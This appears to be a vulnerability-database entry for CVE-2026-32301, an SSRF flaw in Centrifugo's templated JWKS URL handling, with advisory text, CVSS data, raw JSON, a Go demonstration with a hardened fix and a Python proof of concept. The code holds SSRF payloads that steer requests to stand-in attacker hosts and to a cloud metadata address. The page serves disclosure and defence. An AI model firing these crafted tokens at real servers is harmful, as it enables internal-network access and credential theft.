Security Vulnerability Report
CVE-2026-32301 CVSS 9.3 CRITICAL

CVE-2026-32301

Published: 2026-03-13 19:54:41
Last Modified: 2026-03-18 18:02:29

Description

Centrifugo is an open-source scalable real-time messaging server. Prior to 6.7.0, Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination. This vulnerability is fixed in 6.7.0.
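The description above condenses the whole flaw into one sentence: claims are read from the token, rendered into the JWKS URL, and fetched before any signature check, so the attacker chooses where the server connects. The Go program below is an added illustration written for this page, not Centrifugo's code or its 6.7.0 fix. It assumes a template that uses {{iss}} as a tenant subdomain (the advisory's {{tenant}} style), a constructed token with a garbage signature, and the hostnames idp.example and attacker.example; the hardened resolver is one generic mitigation (constrain the interpolated value, then verify the rendered URL stays on the configured origin), shown beside the vulnerable path for contrast.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Claims is the subset of registered JWT claims this example reads.
type Claims struct {
	Iss string `json:"iss,omitempty"`
	Aud string `json:"aud,omitempty"`
}

// unsignedToken builds a compact JWS with a garbage signature (constructed
// sample). Nothing below verifies it, which is exactly the bug being shown.
func unsignedToken(c Claims) string {
	enc := base64.RawURLEncoding
	header := enc.EncodeToString([]byte(`{"alg":"RS256","typ":"JWT"}`))
	payload, _ := json.Marshal(c)
	sig := enc.EncodeToString([]byte("not-a-real-signature"))
	return header + "." + enc.EncodeToString(payload) + "." + sig
}

// unverifiedClaims decodes the payload segment without a signature check.
// A server that picks a JWKS endpoint from claims must do this first, so
// every field here is attacker-controlled.
func unverifiedClaims(token string) (Claims, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return Claims{}, errors.New("malformed compact JWS")
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return Claims{}, err
	}
	var c Claims
	if err := json.Unmarshal(raw, &c); err != nil {
		return Claims{}, err
	}
	return c, nil
}

// renderTemplate substitutes the assumed {{iss}} and {{aud}} placeholders.
func renderTemplate(tmpl string, c Claims) string {
	return strings.NewReplacer("{{iss}}", c.Iss, "{{aud}}", c.Aud).Replace(tmpl)
}

// vulnerableJWKSURL reproduces the flaw: whatever the template renders to is
// fetched. An iss of "attacker.example/#" moves the request to the attacker's
// host and turns the rest of the template into a URL fragment.
func vulnerableJWKSURL(tmpl, token string) (string, error) {
	c, err := unverifiedClaims(token)
	if err != nil {
		return "", err
	}
	return renderTemplate(tmpl, c), nil
}

// safeLabel accepts only a single DNS-label-like value, so a claim cannot
// smuggle a scheme, host, path, query or fragment delimiter into the URL.
func safeLabel(v string) bool {
	if v == "" || len(v) > 63 {
		return false
	}
	for _, r := range v {
		alnum := (r >= 'a' && r <= 'z') || (r >= 'A' && r <= 'Z') || (r >= '0' && r <= '9')
		if !alnum && r != '-' {
			return false
		}
	}
	return true
}

// hardenedJWKSURL is an illustrative mitigation (not the project's fix):
// constrain each interpolated claim, then confirm the rendered URL still
// points at the operator's JWKS domain over HTTPS before anything is fetched.
func hardenedJWKSURL(tmpl, token, allowedDomain string) (string, error) {
	c, err := unverifiedClaims(token)
	if err != nil {
		return "", err
	}
	if strings.Contains(tmpl, "{{iss}}") && !safeLabel(c.Iss) {
		return "", fmt.Errorf("iss %q is not a safe template value", c.Iss)
	}
	if strings.Contains(tmpl, "{{aud}}") && !safeLabel(c.Aud) {
		return "", fmt.Errorf("aud %q is not a safe template value", c.Aud)
	}
	rendered := renderTemplate(tmpl, c)
	u, err := url.Parse(rendered)
	if err != nil {
		return "", err
	}
	if u.Scheme != "https" || !strings.HasSuffix(u.Host, "."+allowedDomain) {
		return "", fmt.Errorf("rendered URL %q leaves %s", rendered, allowedDomain)
	}
	return rendered, nil
}

func main() {
	// Assumed operator template: tenant name taken from iss as a subdomain.
	const tmpl = "https://{{iss}}.idp.example/.well-known/jwks.json"
	for _, iss := range []string{"acme", "attacker.example/#", "169.254.169.254/latest/meta-data/?"} {
		tok := unsignedToken(Claims{Iss: iss})
		v, _ := vulnerableJWKSURL(tmpl, tok)
		h, err := hardenedJWKSURL(tmpl, tok, "idp.example")
		fmt.Printf("iss=%q\n  vulnerable fetches: %s\n  hardened: %q err=%v\n", iss, v, h, err)
	}
}
```

The third sample shows why the vector carries S:C/C:H: with a cloud metadata address in iss, the vulnerable path renders an https URL to 169.254.169.254 with the remainder of the template pushed into the query string, so the server itself performs the internal request. The hardened path refuses both attacker values on the label check alone; the origin check on the parsed URL is defence in depth for templates that place the claim somewhere other than a label position.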

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:centrifugal:centrifugo:*:*:*:*:*:*:*:* - VULNERABLE
Centrifugo < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC - JWT with malicious iss claim
# Note: This is for educational/security research purposes only
# Precondition: a Centrifugo release before 6.7.0 whose JWKS endpoint URL is
# a template rendered from token claims (the advisory's {{tenant}}-style
# placeholder fed from iss or aud). Without that configuration there is no
# claim-controlled URL to steer.
import jwt
import requests
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# The signature is irrelevant to the SSRF: the vulnerable code renders the
# JWKS URL from the unverified claims and fetches it before verification.
# A throwaway RSA key is used only so that RS256 signing succeeds; PyJWT
# rejects a plain string key for RS256.
throwaway_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
signing_pem = throwaway_key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption(),
)

# Example JWT structure demonstrating the attack vector
# The 'iss' field contains a malicious URL that will be interpolated
# into the JWKS fetch URL. 'aud' is the other claim the advisory names as
# an interpolation source; it carries a placeholder host here to show which
# value would steer the request if the template used {{aud}} instead.
malicious_token = jwt.encode(
    {
        'iss': 'http://attacker-controlled-server.com/.well-known/jwks.json',
        'aud': 'internal-service.example',  # placeholder, not a real host
        'exp': 9999999999,
        'sub': 'test',
    },
    signing_pem,
    algorithm='RS256',
)

# The server will make a request to the attacker-controlled URL
# before validating the token signature. The target URL is a placeholder:
# the actual connect endpoint depends on the transport enabled on the target.
response = requests.post(
    'https://target-centrifugo-server/api/connect',
    json={'token': malicious_token},
    timeout=10,
)
print(response.status_code)

References

https://github.com/centrifugal/centrifugo/security/advisories/GHSA-j77h-rr39-c552 - Vendor Advisory (tagged Exploit, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32301",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:54:41.477",
    "lastModified": "2026-03-18T18:02:29.327",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Centrifugo is an open-source scalable real-time messaging server. Prior to 6.7.0, Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination. This vulnerability is fixed in 6.7.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:centrifugal:centrifugo:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "6.7.0",
                "matchCriteriaId": "FFE4B883-6865-417B-B19A-92020BB6F2BB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/centrifugal/centrifugo/security/advisories/GHSA-j77h-rr39-c552",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Mitigation",
          "Vendor Advisory"
        ]
      }
    ]
  }
}